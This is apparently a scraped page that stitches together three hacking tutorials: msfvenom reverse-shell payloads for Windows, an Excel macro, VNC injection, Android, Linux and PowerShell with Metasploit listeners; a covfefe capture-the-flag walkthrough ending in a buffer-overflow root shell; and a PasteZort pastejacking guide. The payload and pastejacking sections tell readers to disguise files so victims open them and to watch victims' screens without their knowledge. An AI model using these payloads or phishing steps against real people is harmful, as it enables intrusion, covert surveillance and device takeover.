msfvenom -p windows/shell_reverse_tcp ahost=192.168.0.107 lport=1111-f exe > /root/Desktop/ncshell.exe
1
msfvenom -p windows/shell_reverse_tcp ahost=192.168.0.107 lport=1111-f exe > /root/Desktop/ncshell.exe
![[Image: 10.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-r_YcTFckiZE/Wg60OXhrAQI/AAAAAAAASYg/A_OshMP1Z7M_rgcKED9LzlamYg9bijKWQCEwYBhgL/s1600/10.png?w=687&ssl=1)
Once the payload is generated and send to the victim for execution, we will start our next step as shown below
We set up our listener using netcat, the image below confirms the shell session capture by the kali machine.
Now from the kali Terminal let us type the command as shown below.
nc -lvp 1111
1
nc -lvp 1111
![[Image: 11.png?w=687&ssl=1]](https://i2.wp.com/4.bp.blogspot.com/--j0gxIBG-mA/Wg60OlgdxyI/AAAAAAAASYg/dPmEFiq7dMAukuiDUoZIVV3GMeWM7wbAACEwYBhgL/s1600/11.png?w=687&ssl=1)
Macro Payload
Let us now create a payload with a VBA script, which we will use to create a macro on Excel to exploit victim machine.
Let us begin to create the payload!!
Open Kali Terminal and type the command as mention below:
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba
1
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.107 lport=7777 -f vba
![[Image: 13.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-valzuetv5_k/Wg60PnWpxbI/AAAAAAAASYg/QNwrfM7ccxIYlSy-63NyPAXLlS06ACqvQCEwYBhgL/s1600/13.png?w=687&ssl=1)
once the command is executed copy the script starting from “#if VBA 7 till “End if” as highlighted in below image:
![[Image: 14.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-yNv2FPIJYJs/Wg60Pn-dz_I/AAAAAAAASYg/4MbIoyrfPfoYDVgmhnRdYdli7Mmq5nxVwCEwYBhgL/s1600/14.png?w=687&ssl=1)
Let us now open an excel file and press alt+F11 key to open VB script, you will get the options box, as shown above, enter the name you will like to provide and click on “create”.
![[Image: 15.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-R06Utd3Z7_Y/Wg60Pyy7kWI/AAAAAAAASYg/wjNokSvvXKkiWsvGS6JcaZMIBQOFwWY2ACEwYBhgL/s1600/15.png?w=687&ssl=1)
You will get a new options box as above, click on “This workbook” and replace the values with your copied vb script payload generated by the msfvenom tool and close the vb script editor and enable the macro.
![[Image: 16.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-pP8LafxM1C4/Wg60Qdr5tOI/AAAAAAAASYg/DnYrhPbWWK4PzTAIwr4tqhKXZbLdrxO8ACEwYBhgL/s1600/16.png?w=687&ssl=1)
Now you may draft your excel file with relevant data which may look realistic for a victim to open the file, in our case we have just inserted the value “Test” save the file and send it to the victim.
To capture the sessions let us now start the multi handler as stated below:
Open kali Terminal and type msfconsole
msf > use exploit/multi/handler
msf exploit(handler) > set paylaod windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 7777
msf exploit(handler) > exploit
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(handler) > set paylaod windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 7777
msf exploit(handler) > exploit
Once the excel file is opened by the victim, it will prompt the victim to enable the macro, once enabled, our VBScript will get executed to provide us with a reverse connection to the victim machine as shown in the below image.
![[Image: 17.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-DEDTdSG1wE0/Wg60QgpLEbI/AAAAAAAASYg/xGFaU05eXkoaTHBHjEjOwKUeut5W-bgqACEwYBhgL/s1600/17.png?w=687&ssl=1)
VNC Payload
Will it is not great if we can take the remote of victim machine without their knowledge and observe their activity anonymously, this payload does exactly that, let us use it to our benefit.
Let us begin to create the payload!! Open Kali Terminal and type the command as mention below:
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe
1
msfvenom -p windows/vncinject/reverse_tcp lhost=192.168.0.107 lport=5900 -f exe > /root/Desktop/vnc.exe
![[Image: 18.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-CprJvoxgHOo/Wg60Q1767MI/AAAAAAAASYg/gCJD8IDMQuY3AjItos0j3uETdARYORHaQCEwYBhgL/s1600/18.png?w=687&ssl=1)
Once the payload is generated and send to the victim for execution, we will start our next step as shown below. To capture the sessions let us now start the multi handler as stated below:
Open kali Terminal and type msfconsole
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set paylaod windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport= 5900
msf exploit(handler) > exploit
1
2
3
4
5
msf exploit(handler) > use exploit/multi/handler
msf exploit(handler) > set paylaod windows/vncinject/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport= 5900
msf exploit(handler) > exploit
![[Image: 19.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-tErOBz_bDNY/Wg60Re2NBwI/AAAAAAAASYg/CVmVTL_WJQgoik4zeSCR0AHUpyPtZZMZQCEwYBhgL/s1600/19.png?w=687&ssl=1)
We can see that reverse connection has executed the VNC injection and the victim remote machine session is established on our kali machine showing Remote Desktop.
![[Image: 20.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-z8uHOmakBlk/Wg60TDnXH5I/AAAAAAAASYg/AoNwzZdcpHQkNAVT5z5FJKomH3zRh5HOwCEwYBhgL/s1600/20.png?w=687&ssl=1)
Android Payload
Exploiting handheld devices have always been a hot topic and still continues, hence we have included it in our article as well, let us use one of the androids exploit available within the msfvenom tool and use it to our benefit.
Let’s begin
Open Kali Terminal and type the command as mention below:
msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk
1
msfvenom -p andriod/meterpreter/reverse_tcp lhost=192.168.0.107 lport=8888 > /root/Desktop/file.apk
![[Image: 21.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-uvrkJ0PE0Tc/Wg60TaknKVI/AAAAAAAASYg/oxgkrR9ll6kwx_r7s2hIapx3lHnZQxnPACEwYBhgL/s1600/21.png?w=687&ssl=1)
Once the payload gets generated send it to the victim to execute on his handheld and start multi handler as shown in below image.
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 8888
msf exploit(handler) > exploit
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 8888
msf exploit(handler) > exploit
Once the payload gets executed, you will get the meterpreter session of the handheld, which is now in your control as shown below.
![[Image: 22.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-nhdFZqXRFtU/Wg60TnBs8mI/AAAAAAAASYg/9K5mC2muN2weqg8_0AU1kEkbj-Ve3XYLwCEwYBhgL/s1600/22.png?w=687&ssl=1)
Linux Payload
Open Kali Terminal and type the command as mention below:
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell
1
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.0.107 lport=4444 -f elf > /root/Desktop/shell
![[Image: 25.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-IBzvjXHUKMQ/Wg60Ukuf-cI/AAAAAAAASYg/Z4LEt2LAzBQXc9xuc0fiM8KIYXQA603rgCEwYBhgL/s1600/25.png?w=687&ssl=1)
Once the payload gets generated send it to the victim to execute on his Linux machine and start multi handler as shown in below image.
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lhost 4444
msf exploit(handler) > run
1
2
3
4
5
msf > use exploit/multi/handler
msf exploit(handler) > set payload linux/x86/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lhost 4444
msf exploit(handler) > run
Once the payload gets executed, it will create a reverse tcp connection on our kali machine providing us with meterpreter sessions, as shown on the image below.
![[Image: 26.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-GywOuGQmz0s/Wg60Uzx-iQI/AAAAAAAASYg/U900LsaYayYfx5Zge0vKgaOMUDYMvc_OgCEwYBhgL/s1600/26.png?w=687&ssl=1)
Powershell Payload
Open Kali Terminal and type the command as mention below:
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat
1
msfvenom -p cmd/windows/reverse_powershell lhost=192.168.0.107 lport=4444 > /root/Desktop/shell.bat
![[Image: 23.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-aeGuAiIrrIk/Wg60TzJOQ0I/AAAAAAAASYg/zbk-2BfIiXcfuF6vyPMXROTVMHwNWlJ5wCEwYBhgL/s1600/23.png?w=687&ssl=1)
Once the payload gets generated send it to the victim to execute on his windows machine and start multi handler as shown in below image.
msf > use multi/handler
msf exploit(handler) > set payload cmd/windows/reverse_powershell
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
1
2
3
4
5
msf > use multi/handler
msf exploit(handler) > set payload cmd/windows/reverse_powershell
msf exploit(handler) > set lhost 192.168.0.107
msf exploit(handler) > set lport 4444
msf exploit(handler) > run
Once the payload gets executed, it will create a reverse connection to shell as shown in the image below.
![[Image: 24.png?w=687&ssl=1]](https://i1.wp.com/2.bp.blogspot.com/-fvpoGTbdZu0/Wg60Ud5b3tI/AAAAAAAASYg/3SCL854PZuAZfMw4Is3ZFzI_mIqGXPFJQCEwYBhgL/s1600/24.png?w=687&ssl=1)
Today we are going to take on another challenge known as “covfefe”.IT is a Debian 9 based Boot to root VM, originally created as a CTF for SecTalks_BNE. The author of this VM is “Tim Kent”. We have to find 3 flags to complete the challenge.
You can download this VM:
[To see content please register here]
Security Level: Beginner
Penetrating Methodology:
Scanning
- Netdiscover
- NMAP
- Web spidering
- Directory enumeration
- Ssh login
- John
- Exploiting SUID Executables
Walkthrough
Scanning
Let’s start off by scanning the network and identifying host IPs. As illustrated below, we can identify our host IP as 192.168.1.101.
netdiscover
1
netdiscover
![[Image: 1.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-t4ddW7fc9cA/XQUCvve96EI/AAAAAAAAezc/f95_-1VNyxA66gtDWjiao78QEmJ9AAtLACLcBGAs/s1600/1.png?w=687&ssl=1)
Time to scan the Target’s IP with Nmap.
nmap -A 192.168.1.101
1
nmap -A 192.168.1.101
As you can see in the following screenshot that port 22, 80 and 31337 are open.
![[Image: 2.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-k67HLxTeqBE/XQUCw5f53uI/AAAAAAAAezw/gJhyc81Y4poVFjVYTrvfJDTjl1V7hVH0ACLcBGAs/s1600/2.png?w=687&ssl=1)
Enumeration
Browsing the IP with HTTP port 31337 doesn’t give any result.
![[Image: 3.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-Yf4sFLNuhV4/XQUCxBlx5yI/AAAAAAAAez0/QYeMtZZQnmIVSlgXgDBXouwaZVuPbgEegCLcBGAs/s1600/3.png?w=687&ssl=1)
Directory enumeration using dirb shows two interesting directories “/.ssh” and “/.robots.txt”. Nmap scan has earlier shown robots.txt as well but to dig dipper we went with dirb.
dirb
[To see content please register here]
1
dirb
[To see content please register here]
![[Image: 4.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-HXl3IieKz4A/XQUCxgjHYwI/AAAAAAAAez4/2QEQwhfGXIMr7pf6P15egE_pbAVNq3D9gCLcBGAs/s1600/4.png?w=687&ssl=1)
Further enumeration of robots.txt using curl shows a file “/taxes” among others. And as soon as we open it, we get our first flag.
curl http:// 192.168.1.101:31337/robots.txt
1
curl http:// 192.168.1.101:31337/robots.txt
![[Image: 5.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-nWbDeZHLWa4/XQUCxw-ZtTI/AAAAAAAAez8/CdOPvtGW1AsBKBHPUUD4J9Qc5mzrVTwjgCLcBGAs/s1600/5.png?w=687&ssl=1)
On browsing 192.168.1.101:31337/.ssh we find ssh private and public key respectively as ‘id_rsa’ and ‘id_rsa.pub’ & authorized_keys.
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-UhiyP6jxEI0/XQUCyPnV5iI/AAAAAAAAe0A/15zq8FdSkLgFbZ6h5XTIgP0pyKYR6wzewCLcBGAs/s1600/6.png?w=687&ssl=1)
We get a download prompt while opening ‘authorized_keys’ in the browser so we download it. We downloaded id_rsa too in the same way.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-mfTpfzQdJPo/XQUCym-XjmI/AAAAAAAAe0E/pQ75tajOGHgFutCuJOTwhqumahNhqr6owCLcBGAs/s1600/7.png?w=687&ssl=1)
When we open authorized_keys we find a username ‘simon’ for the private key.
cat authorized_keys
1
cat authorized_keys
![[Image: 8.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-OCD2NuBfl6M/XQUCynoiVyI/AAAAAAAAe0I/YFLNS2cLYLwjRpYWU8mThJ7NShCTHRtoQCLcBGAs/s1600/8.png?w=687&ssl=1)
Exploiting
Now we use the private key to connect to the VM through ssh. But it is asking for a passphrase here.
ssh -i id_rsa [email protected]
1
ssh -i id_rsa [email protected]
![[Image: 9.png?w=687&ssl=1]](https://i2.wp.com/1.bp.blogspot.com/-kbJyM2dr2nM/XQUCy28nq4I/AAAAAAAAe0M/x8iWHPtjBMwEnV_ACkzMatN8njfPsqzEwCLcBGAs/s1600/9.png?w=687&ssl=1)
We have to change its format, which can be done using a john utility called “
[To see content please register here]
”. It will convert ‘ id_rsa’ to a hash format recognized by johntheripper. Now let’s use John the Ripper to crack this hash.chmod 777 ssh2john.py
python ssh2john.py id_rsa > hash
john hash --show
1
2
3
chmod 777 ssh2john.py
python ssh2john.py id_rsa > hash
john hash --show
We find that passphrase of the key is starwars. Now we use this passphrase along with the key to connect through ssh.
![[Image: 10.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-_sQhUsGlh0I/XQUCvvXKWeI/AAAAAAAAezk/0zMBLZQU44IBW01srYIvj6niFHBKBSidACLcBGAs/s1600/10.png?w=687&ssl=1)
After successful ssh login using our newly acquired passphrase, we search for the SUID binaries.
ssh -i id_rsa [email protected]
find / -perm -u=s -type f 2>/dev/null
1
2
ssh -i id_rsa [email protected]
find / -perm -u=s -type f 2>/dev/null
Here we notice ‘usr/local/bin/read_message” that takes the user input and displays a message. We provide ‘simon’ as a username when asked. There is a hint for username inside the message. It should be ‘Simon’ instead of ‘simon’.
usr/local/bin/read_message
1
usr/local/bin/read_message
![[Image: 11.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-stkBDkKrsmY/XQUCvqMcC3I/AAAAAAAAezg/Bm_n7rJHdks_-xOmZtAlrQ4hHZ1hKPmuACLcBGAs/s1600/11.png?w=687&ssl=1)
Privilege Escalation
Again when we open ‘read_message’ and provide ‘Simon’ as username, we get a message with a hint that we can find something in the root. Now when we enter the ‘/root’ folder and list its content we find two files named ‘flag.txt’ and ‘read_message.c’. We can’t access flag.txt yet. Moving on, inside ‘read_message’ we find our second flag.
cd /root
ls
cat flag.txt
cat read_meassage.c
1
2
3
4
cd /root
ls
cat flag.txt
cat read_meassage.c
![[Image: 12.png?w=687&ssl=1]](https://i1.wp.com/1.bp.blogspot.com/-LsFoWTcx-OI/XQUCwTtOoBI/AAAAAAAAezo/hm57opC6VJoSRqnP51Dyru39gJ-Ws-bkgCLcBGAs/s1600/12.png?w=687&ssl=1)
In above screenshot reading through the source code we find that, when we enter a string it reads the first 5 characters of the string as Simon, if it matches then it runs /usr/local/sbin/message. But the input allocation for this is 20 bytes. So, we have to overflow the stack entering more than 20 bytes of data. We use the first 5 char to be ‘Simon’ followed by 15 ‘A’ and then ‘/bin/sh’ at the 21st byte.
read_message
SimonAAAAAAAAAAAAAAA/bin/sh
cd /root
ls
cat flag.txt
1
2
3
4
5
read_message
SimonAAAAAAAAAAAAAAA/bin/sh
cd /root
ls
cat flag.txt
As soon as we provide this string, we spawn a shell as root. Now we can access flag.txt. Finally, we found the third flag.
![[Image: 13.png?w=687&ssl=1]](https://i0.wp.com/1.bp.blogspot.com/-nOQYoDsHGT0/XQUCwmFfpSI/AAAAAAAAezs/BUPcvO9hMVEb7y6nwMwTRuz2bdwyXQ2TwCLcBGAs/s1600/13.png?w=687&ssl=1)
Pastejacking is a technique that takes over the clipboard of a machine, for instance, when we copy text from a website, that text can be riddled with malicious code that will execute when the text is pasted in a victim’s machine. This is a very good way to achieve a Meterpreter session because of its simplicity. All that needs to be done is; copy some harmless words from the browser and paste them on the command prompt and that’s it, session!!
We are going to walk you through the process, using a tool called PasteZort
Here’s how it happens:
The first thing you’ll need to do is get the tool from Github.
To keep it simple, from your Kali terminal, and type the following command
git clone
[To see content please register here]
1
git clone
[To see content please register here]
This will make a PasteZort folder on your desktop with the tool in it
![[Image: 1.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-D5Vg-d_q0t4/Wgpz1hbcb2I/AAAAAAAASVA/vL8VZRhkDoo8GZu9DZWLcwWTZQkewjMWwCLcBGAs/s1600/1.png?w=687&ssl=1)
Open the folder and you will see all the files you need to run this tool, the inside of the folder will look like the screenshot given below.
![[Image: 2.png?w=687&ssl=1]](https://i2.wp.com/3.bp.blogspot.com/-x4fvJpW6UkE/Wgpz1AjgcGI/AAAAAAAASU4/l1dFX9--B_cs40SSCwxrcKcPHbhZeekWQCLcBGAs/s1600/2.png?w=687&ssl=1)
In order to execute the tool we first must change the permission of the “encode.rb” file. Right click on the “encode.rb” file and open its properties, under properties, go to the “Permissions” tab, check the box in front of “Execute” that says “Allow executing the file as program”.
![[Image: 3.png?w=687&ssl=1]](https://i1.wp.com/4.bp.blogspot.com/-93wfCgWRTkI/Wgpz1dtE_wI/AAAAAAAASU8/0lBHFz3jZ0EeslmVcRKTxCXQxe3qFAJBACEwYBhgL/s1600/3.png?w=687&ssl=1)
Navigate to the PasteZort folder from the Kali terminal, now execute the tool using “python ./PasteZOrt.py”. Your tool is now running.
Now we can get started on making our pastejacking payload using the tools interphase. We will be making a windows payload, so in front of “Objectves:” type “1” to choose Windows as the targeted operating system.
![[Image: 5.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-EjmZSxIHg34/Wgpz2IpQHQI/AAAAAAAASVI/AOxGCoWDpc0o8ZWL207MBnvXjf4RjbM0wCEwYBhgL/s1600/5.png?w=687&ssl=1)
After that, again choose option “1” under “Select Payload” to generate a windows reverse tcp shell. Enter your IP address in “LHOST” and the port number you want the exploit to communicate with in “LPORT”
You will now get an option to enter the message you want displayed as the pastejacking text, for example: we have written “ping” and “
[To see content please register here]
”.And that’s it, your payload is ready.
You will now be asked, if you would like to turn on Handler, type “Y” and press enter
![[Image: 6.png?w=687&ssl=1]](https://i2.wp.com/2.bp.blogspot.com/-RzHvB38ZnPg/Wgpz186ID_I/AAAAAAAASVE/4iaU9fDA9IIydTBKLtlyvm6iFK_Le4rQgCEwYBhgL/s1600/6.png?w=687&ssl=1)
Open a web browser on the victim machine and enter your IP in the address bar, the text you typed in the message section will appear, select the text and copy it.
![[Image: 7.png?w=687&ssl=1]](https://i0.wp.com/4.bp.blogspot.com/-qMaIgVmp5zY/Wgpz2aAwdzI/AAAAAAAASVM/LpyKfA8E8aY84cEJ6jlowpCjn_qSJ4xnACEwYBhgL/s1600/7.png?w=687&ssl=1)
Open a command prompt on the victim machine, paste the copied text and press Enter.
![[Image: 8.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-XSklIdWUysg/Wgpz2xQUSvI/AAAAAAAASVU/-YeaZ07t6uEQIueYwJt4mhB1k-zlFratACEwYBhgL/s1600/8.png?w=687&ssl=1)
Go back to the Kali terminal and you will see Handler starting the reverse tcp and that’s it, you’ve done it. You now have a Meterpreter session, plain and simple.
![[Image: 9.png?w=687&ssl=1]](https://i0.wp.com/3.bp.blogspot.com/-Sh91RO8RP0U/Wgpz20Xo3MI/AAAAAAAASVQ/PousZg3YUaEMXN0KjdPDLaR87fRi-seyQCEwYBhgL/s1600/9.png?w=687&ssl=1)
The beauty of this tool lies in its simplicity, it has a clean interphase with an intuitive workflow and can get effective results without any mess. The message section makes it easy to make your payload look as harmless as possible. This also goes to show how easy it is to get hacked, so stay vigilant.
Have fun and stay ethical.
